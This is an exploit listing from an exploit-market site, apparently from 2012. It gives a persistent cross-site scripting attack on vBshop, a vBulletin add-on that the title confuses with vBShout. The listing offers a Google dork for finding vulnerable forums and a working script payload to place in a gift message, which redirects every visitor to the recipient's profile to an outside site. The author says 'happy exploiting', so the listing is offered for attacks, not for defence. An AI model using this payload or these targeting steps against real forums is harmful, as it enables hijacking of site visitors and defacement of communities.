[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

vBshop persistent Persisstant XSS

Author
ToiL
Risk
[
Security Risk High
]
0day-ID
0day-ID-17832
Category
web applications
Date add
26-03-2012
Platform
php
# Exploit Title: vBshop persistent XSS 0day
# Google Dork: "DragonByte Technologies Ltd" vbshout
# Date: 25/3/2012 9:32 PM #EST
# Author: ToiL
# Software Link: http://www.dragonbyte-tech.com/
# Version: all
# Tested on: all
# CVE : XSS
 
#Greeting from Team Odyessy.
#Today we will release a 0day for the vBulletin mod, vBShout.
#This 0day exploit is brought to you by
www.Bugabuse.net/<http://www.bugabuse.net/>
#Have fun, And happy exploiting.
 
######Guide########
 
 
Go to vBshop
Gift an item to aother user.
In the 'message to user' put:
<script>top.location='https://www.bugabuse.net/';</script>
Send the item off.
Go to the users profile that you gifted
Boom. Pers. XSS.
Edit to your likeing.



#  0day.today [2024-12-27]  #